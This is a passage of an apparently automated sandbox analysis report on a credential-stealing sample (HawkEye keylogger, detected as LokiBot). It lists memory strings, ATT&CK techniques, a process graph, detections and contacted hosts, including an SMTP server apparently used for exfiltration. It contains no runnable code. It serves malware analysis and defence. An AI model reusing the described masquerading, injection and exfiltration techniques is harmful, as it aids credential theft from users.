          Source: Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_024E0B5E listen,2_2_024E0B5E
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_024E0F6E bind,2_2_024E0F6E
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_024E0B20 listen,2_2_024E0B20
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_024E0F3B bind,2_2_024E0F3B
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_04BD0F6E bind,10_2_04BD0F6E
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_04BD0B5E listen,10_2_04BD0B5E
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_04BD0F3B bind,10_2_04BD0F3B
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_04BD0B20 listen,10_2_04BD0B20

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Replication Through Removable Media1Windows Management Instrumentation21Application Shimming1Application Shimming1Disable or Modify Tools111OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsNative API21Registry Run Keys / Startup Folder1Access Token Manipulation1Deobfuscate/Decode Files or Information11Input Capture21Peripheral Device Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Process Injection412Obfuscated Files or Information31Credentials in Registry2Account Discovery1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationEncrypted Channel1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Software Packing11Credentials In Files1File and Directory Discovery2Distributed Component Object ModelInput Capture21Scheduled TransferNon-Standard Port1SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsSystem Information Discovery29SSHClipboard Data1Data Transfer Size LimitsRemote Access Software1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsQuery Registry1VNCGUI Input CaptureExfiltration Over C2 ChannelNon-Application Layer Protocol3Jamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion41DCSyncSecurity Software Discovery181Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolApplication Layer Protocol13Rogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemVirtualization/Sandbox Evasion41Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection412/etc/passwd and /etc/shadowProcess Discovery4Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
          Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingSystem Network Configuration Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 535767 Sample: 5.exe Startdate: 07/12/2021 Architecture: WINDOWS Score: 100 47 127.0.0.1 unknown unknown 2->47 57 Malicious sample detected (through community Yara rule) 2->57 59 Multi AV Scanner detection for dropped file 2->59 61 Multi AV Scanner detection for submitted file 2->61 63 12 other signatures 2->63 10 5.exe 17 2->10         started        signatures3 process4 file5 39 C:\Users\user\AppData\Local\...\rgsbzeog.dll, PE32 10->39 dropped 81 Injects a PE file into a foreign processes 10->81 14 5.exe 9 10->14         started        signatures6 process7 file8 41 C:\Users\user\AppData\...\Windows Update.exe, PE32 14->41 dropped 43 C:\...\Windows Update.exe:Zone.Identifier, ASCII 14->43 dropped 45 C:\Users\user\AppData\Local\...\5.exe.log, ASCII 14->45 dropped 17 Windows Update.exe 16 14->17         started        process9 file10 33 C:\Users\user\AppData\Local\...\rgsbzeog.dll, PE32 17->33 dropped 55 Injects a PE file into a foreign processes 17->55 21 Windows Update.exe 16 8 17->21         started        signatures11 process12 dnsIp13 49 whatismyipaddress.com 104.16.155.36, 49751, 80 CLOUDFLARENETUS United States 21->49 51 smtp.privateemail.com 66.29.159.53, 49765, 587 ADVANTAGECOMUS United States 21->51 53 192.168.2.1 unknown unknown 21->53 35 C:\Users\user\AppData\...\WindowsUpdate.exe, PE32 21->35 dropped 37 C:\...\WindowsUpdate.exe:Zone.Identifier, ASCII 21->37 dropped 65 Changes the view of files in windows explorer (hidden files and folders) 21->65 67 Deletes itself after installation 21->67 69 Writes to foreign memory regions 21->69 71 4 other signatures 21->71 26 vbc.exe 1 21->26         started        29 vbc.exe 2 21->29         started        31 dw20.exe 22 6 21->31         started        file14 signatures15 process16 signatures17 73 Tries to steal Mail credentials (via file registry) 26->73 75 Tries to steal Instant Messenger accounts or passwords 26->75 77 Tries to steal Mail credentials (via file / registry access) 26->77 79 Tries to harvest and steal browser information (history, passwords, etc) 29->79

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          5.exe41%VirustotalBrowse
          5.exe31%ReversingLabsWin32.Trojan.LokiBot
          5.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\Windows Update.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\nsw2209.tmp\rgsbzeog.dll33%ReversingLabsWin32.Trojan.LokiBot
          C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll33%ReversingLabsWin32.Trojan.LokiBot
          C:\Users\user\AppData\Roaming\Windows Update.exe31%ReversingLabsWin32.Trojan.LokiBot
          C:\Users\user\AppData\Roaming\WindowsUpdate.exe31%ReversingLabsWin32.Trojan.LokiBot

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          16.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1125438Download File
          2.2.5.exe.415058.0.unpack100%AviraTR/Inject.vcoldiDownload File
          10.0.Windows Update.exe.38c3258.47.unpack100%AviraTR/Inject.vcoldiDownload File
          16.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1125438Download File
          15.0.vbc.exe.400000.4.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.0.Windows Update.exe.415058.18.unpack100%AviraTR/Inject.vcoldiDownload File
          10.0.Windows Update.exe.38c3258.25.unpack100%AviraTR/Inject.vcoldiDownload File
          2.0.5.exe.400000.13.unpack100%AviraTR/AD.MExecute.lzracDownload File
          2.0.5.exe.400000.13.unpack100%AviraSPR/Tool.MailPassView.473Download File
          2.0.5.exe.415058.16.unpack100%AviraTR/Inject.vcoldiDownload File
          10.0.Windows Update.exe.400000.4.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.0.Windows Update.exe.400000.4.unpack100%AviraSPR/Tool.MailPassView.473Download File
          16.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
          2.0.5.exe.400000.5.unpack100%AviraTR/AD.MExecute.lzracDownload File
          2.0.5.exe.400000.5.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.0.Windows Update.exe.400000.6.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.0.Windows Update.exe.400000.6.unpack100%AviraSPR/Tool.MailPassView.473Download File
          15.0.vbc.exe.400000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.2.Windows Update.exe.400000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.2.Windows Update.exe.400000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
          15.0.vbc.exe.400000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.0.Windows Update.exe.400000.7.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.0.Windows Update.exe.400000.7.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.0.Windows Update.exe.4a50000.52.unpack100%AviraTR/Inject.vcoldiDownload File
          10.0.Windows Update.exe.400000.13.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.0.Windows Update.exe.400000.13.unpack100%AviraSPR/Tool.MailPassView.473Download File
          6.2.Windows Update.exe.147a0000.1.unpack100%AviraTR/Inject.vcoldiDownload File
          2.0.5.exe.400000.7.unpack100%AviraTR/AD.MExecute.lzracDownload File
          2.0.5.exe.400000.7.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.0.Windows Update.exe.400000.5.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.0.Windows Update.exe.400000.5.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.0.Windows Update.exe.400000.8.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.0.Windows Update.exe.400000.8.unpack100%AviraSPR/Tool.MailPassView.473Download File
          2.0.5.exe.400000.9.unpack100%AviraTR/AD.MExecute.lzracDownload File
          2.0.5.exe.400000.9.unpack100%AviraSPR/Tool.MailPassView.473Download File
          1.2.5.exe.148b1458.4.unpack100%AviraTR/Inject.vcoldiDownload File
          10.2.Windows Update.exe.38c3258.7.unpack100%AviraTR/Inject.vcoldiDownload File
          2.0.5.exe.400000.8.unpack100%AviraTR/AD.MExecute.lzracDownload File
          2.0.5.exe.400000.8.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.1.Windows Update.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.1.Windows Update.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
          2.2.5.exe.3863258.6.unpack100%AviraTR/Inject.vcoldiDownload File
          10.0.Windows Update.exe.400000.19.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.0.Windows Update.exe.400000.19.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.2.Windows Update.exe.415058.2.unpack100%AviraTR/Inject.vcoldiDownload File
          2.2.5.exe.4a90000.12.unpack100%AviraTR/Inject.vcoldiDownload File
          10.2.Windows Update.exe.4a50000.15.unpack100%AviraTR/Inject.vcoldiDownload File
          15.0.vbc.exe.400000.1.unpack100%AviraSPR/Tool.MailPassView.473Download File
          16.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1125438Download File
          2.1.5.exe.415058.3.unpack100%AviraTR/Inject.vcoldiDownload File
          2.0.5.exe.400000.4.unpack100%AviraTR/AD.MExecute.lzracDownload File
          2.0.5.exe.400000.4.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.0.Windows Update.exe.415058.41.unpack100%AviraTR/Inject.vcoldiDownload File
          10.0.Windows Update.exe.400000.9.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.0.Windows Update.exe.400000.9.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.0.Windows Update.exe.4a50000.30.unpack100%AviraTR/Inject.vcoldiDownload File
          10.0.Windows Update.exe.4ae0000.33.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.0.Windows Update.exe.4ae0000.33.unpack100%AviraSPR/Tool.MailPassView.473Download File
          6.2.Windows Update.exe.147b1458.4.unpack100%AviraTR/Inject.vcoldiDownload File
          16.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
          2.0.5.exe.400000.6.unpack100%AviraTR/AD.MExecute.lzracDownload File
          2.0.5.exe.400000.6.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.1.Windows Update.exe.415058.1.unpack100%AviraTR/Inject.vcoldiDownload File
          1.2.5.exe.148a0000.1.unpack100%AviraTR/Inject.vcoldiDownload File
          15.0.vbc.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.2.Windows Update.exe.4ae0000.16.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.2.Windows Update.exe.4ae0000.16.unpack100%AviraSPR/Tool.MailPassView.473Download File
          10.0.Windows Update.exe.415058.14.unpack100%AviraTR/Inject.vcoldiDownload File
          10.0.Windows Update.exe.4ae0000.55.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.0.Windows Update.exe.4ae0000.55.unpack100%AviraSPR/Tool.MailPassView.473Download File
          2.2.5.exe.4b20000.15.unpack100%AviraTR/AD.MExecute.lzracDownload File
          2.2.5.exe.4b20000.15.unpack100%AviraSPR/Tool.MailPassView.473Download File
          2.1.5.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
          2.1.5.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
          2.2.5.exe.400000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
          2.2.5.exe.400000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
          2.0.5.exe.415058.12.unpack100%AviraTR/Inject.vcoldiDownload File
          10.0.Windows Update.exe.415058.12.unpack100%AviraTR/Inject.vcoldiDownload File
          10.0.Windows Update.exe.400000.40.unpack100%AviraTR/AD.MExecute.lzracDownload File
          10.0.Windows Update.exe.400000.40.unpack100%AviraSPR/Tool.MailPassView.473Download File
          16.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1125438Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://ocsp.sectigo.com00%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.fontbureau.comiona0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.carterandcone.comB0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.fontbureau.comao0%Avira URL Cloudsafe
          http://www.fonts.comn0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.fontbureau.comrsiv0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
          https://sectigo.com/CPS00%URL Reputationsafe
          http://www.tiro.comn0%URL Reputationsafe
          https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://fontfabrik.com-g0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.tiro.comc0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          whatismyipaddress.com
          		104.16.155.36
          		truefalse
            		high
            smtp.privateemail.com
            		66.29.159.53
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://whatismyipaddress.com/false
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.fontbureau.com/designersG5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designers/?5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bThe5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://ocsp.sectigo.com0Windows Update.exe, 0000000A.00000000.357158705.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.391292729.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.387090666.0000000002CF8000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.390908357.0000000007210000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers?5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                        		high
                        https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngvbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340312511.0000000002248000.00000004.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers22Ob5.exe, 00000002.00000003.273252197.000000000505E000.00000004.00000001.sdmpfalse
                            		high
                            http://www.msn.comvbc.exe, 00000010.00000003.343082819.000000000223C000.00000004.00000001.sdmpfalse
                              		high
                              http://www.tiro.com5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268627558.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268801308.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268958475.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268917627.000000000506B000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                		high
                                http://www.goodfont.co.kr5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.com5.exe, 00000002.00000003.271540759.0000000005067000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.comiona5.exe, 00000002.00000002.290939251.0000000000CA7000.00000004.00000040.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.com5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.com/chrome/vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.carterandcone.comB5.exe, 00000002.00000003.271500406.0000000005069000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.typography.netD5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/cThe5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htm5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.com5.exe, 00000002.00000003.268458431.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268513448.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268547687.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268571810.000000000506B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96evbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340338212.0000000000A7D000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.fontbureau.comao5.exe, 00000002.00000002.290939251.0000000000CA7000.00000004.00000040.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmpfalse
                                      		high
                                      https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340338212.0000000000A7D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340322614.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341427101.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341765641.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340389742.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340531086.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343112039.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341513562.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343137621.000000000224F000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.msn.com/?ocid=iehpvbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340460198.0000000002244000.00000004.00000001.sdmpfalse
                                          		high
                                          http://whatismyipaddress.com/-5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.fonts.comn5.exe, 00000002.00000003.268117935.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268074577.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268042505.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268148982.000000000506B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPlease5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://login.yahoo.com/config/login5.exe, Windows Update.exe, vbc.exefalse
                                              		high
                                              http://www.fontbureau.comrsiv5.exe, 00000002.00000002.290939251.0000000000CA7000.00000004.00000040.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fonts.com5.exe, 00000002.00000003.268042505.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.sandoll.co.kr5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.site.com/logs.phpWindows Update.exe, 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://cvbc.exe, 00000010.00000003.340338212.0000000000A7D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340322614.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341427101.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341765641.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340389742.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340531086.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343112039.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341513562.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343137621.000000000224F000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340312511.0000000002248000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.urwpp.deDPlease5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.nirsoft.net/vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmpfalse
                                                        		high
                                                        http://www.zhongyicts.com.cn5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&vbc.exe, 00000010.00000003.340338212.0000000000A7D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340322614.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341427101.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341765641.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340389742.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340531086.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343112039.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341513562.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343137621.000000000224F000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.sakkal.com5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
